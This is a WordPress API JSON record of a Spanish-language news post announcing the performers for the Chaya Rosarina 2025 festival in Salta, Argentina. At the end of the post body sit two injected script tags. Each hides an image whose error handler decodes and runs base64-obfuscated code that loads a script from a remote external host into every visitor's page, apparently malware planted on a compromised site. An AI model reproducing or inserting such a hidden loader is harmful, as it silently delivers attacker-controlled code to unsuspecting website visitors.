{"id":4893,"date":"2025-02-27T10:41:55","date_gmt":"2025-02-27T13:41:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4893"},"modified":"2025-08-13T23:39:43","modified_gmt":"2025-08-14T02:39:43","slug":"folklore-cumbia-y-fiesta-la-chaya-rosarina-2025-presento-su-imponente-cartelera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4893","title":{"rendered":"Folklore, cumbia y fiesta: la Chaya Rosarina 2025 present\u00f3 su imponente cartelera"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-aae6f1f38bda5d50f7ad72ef85775d8b\" style=\"background-color:#7d083f\"><strong><em>Rosario de la Frontera se prepara para la Chaya Rosarina 2025, el 2 y 3 de marzo. La presentaci\u00f3n oficial fue realizada en Pe\u00f1a Balderrama por el intendente de la localidad junto a referentes culturales y artistas.<\/em><\/strong><\/h4>\n\n\n\n<p>Rosario de la Frontera se prepara para vivir una de las celebraciones m\u00e1s esperadas del verano con la Chaya Rosarina 2025.<br><br>Organizada por la Municipalidad y con la gesti\u00f3n del intendente Kuldeep Singh, esta fiesta tendr\u00e1 lugar los d\u00edas 2 y 3 de marzo en el complejo deportivo de la localidad.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16179-folklore-cumbia-y-fiesta-la-chaya-rosarina-2025-presento-su-imponente-cartelera.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16179-folklore-cumbia-y-fiesta-la-chaya-rosarina-2025-presento-su-imponente-cartelera.webp\" alt=\"Folklore, cumbia y fiesta: la Chaya Rosarina 2025 present\u00f3 su imponente cartelera\"\/><\/a><\/figure>\n\n\n\n<p>Considerada el festival m\u00e1s grande del sur provincial, la Chaya Rosarina se ha convertido en un evento clave del calendario cultural de Salta, atrayendo a miles de asistentes cada a\u00f1o. Entre harina, albahaca y nieve artificial, la tradici\u00f3n se mezcla con la m\u00fasica y la alegr\u00eda en dos noches imperdibles de folklore y cumbia.<\/p>\n\n\n\n<p>La cartelera de la edici\u00f3n 2025 reunir\u00e1 a artistas de renombre y talentos emergentes para brindar espect\u00e1culos inolvidables. El domingo 2 de marzo, el p\u00fablico podr\u00e1 disfrutar de la presentaci\u00f3n de El Chaque\u00f1o Palavecino, Paola Arias, Karina, Los Bybys, Oscar y la Repandilla, Uriel Lozano, Chirettes, Tuc\u00e1n y Chaya, Llokallas, y un extenso listado de m\u00fasicos que incluye a Gallego Mart\u00ednez, Edu Ruiz Sosita, Marianela Santos, Waldo Calatay\u00fa, Nick Galarza, Emanuel Rivas, Reflejo de Luna, Maxi y su Banda, Agustina Saavedra, Yanay, D\u00fao Dauthat, Sergio Jr., Franja, Nicol\u00e1s Dieringer, Piantao, Hern\u00e1n Ceballos y Fantas\u00eda Colombiana.<\/p>\n\n\n\n<p>El lunes 3 de marzo, la fiesta continuar\u00e1 con un despliegue art\u00edstico que contar\u00e1 con Eugenia Quevedo y Daniel Hoyos, Iban Ruiz, Banda XXI y David Leiva, Christian Herrera y Nico Mattioli, Herencia Ancestral, D\u00fao Hermanados, Hermanos Sosa y Herencia Santiague\u00f1a, Los Ca\u00f1etes y Feliciano Serrano, Hern\u00e1n Navarro y Fe Mayor, Emilse Humacata, Thiago y los Hnos. Sosa, Sof\u00eda Rodr\u00edguez y Emilia Hormigo, Luz Moreno y Juampy Pellicer, Thiago Cabral, Runakay y Cauces, Daniel Daniel, Lilo y Su Cuarteto y El Clan.<\/p>\n\n\n\n<p>Este fin de semana largo la venta de entradas continuar\u00e1 en diferentes puntos en Rosario de la Frontera e inclusive se vender\u00e1n en puerta.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Rosario de la Frontera se prepara para la Chaya Rosarina 2025, el 2 y 3 de marzo. La presentaci\u00f3n oficial fue realizada en Pe\u00f1a Balderrama por el intendente de la localidad junto a referentes culturales y artistas. Rosario de la Frontera se prepara para vivir una de las celebraciones m\u00e1s esperadas del verano con la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4894,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,15],"tags":[],"class_list":{"0":"post-4893","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4893"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4893"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4893\/revisions"}],"predecessor-version":[{"id":6560,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4893\/revisions\/6560"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4894"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4893"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}